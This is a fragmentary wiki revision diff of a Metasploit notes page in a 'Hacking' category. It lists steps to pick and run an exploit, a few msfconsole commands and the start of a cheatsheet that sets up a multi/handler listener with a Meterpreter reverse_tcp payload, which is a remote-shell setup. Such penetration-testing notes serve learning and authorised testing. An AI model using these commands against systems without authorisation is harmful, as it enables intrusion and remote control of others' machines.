MSF: Difference between revisions

7 bytes added ,  6 years ago
no edit summary
No edit summary
No edit summary
 
Line 1:
[[Category:Hacking]]
__TOC__
 
= Overview =
=Metasploit=
Steps:
1. Pick which exploit to use
Line 9 ⟶ 10:
5. Execute the exploit
 
= Common Commands: =
msfconsole
show expolit windows
Line 25 ⟶ 26:
exploit
 
==MSF Complete Cheatsheet= =
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp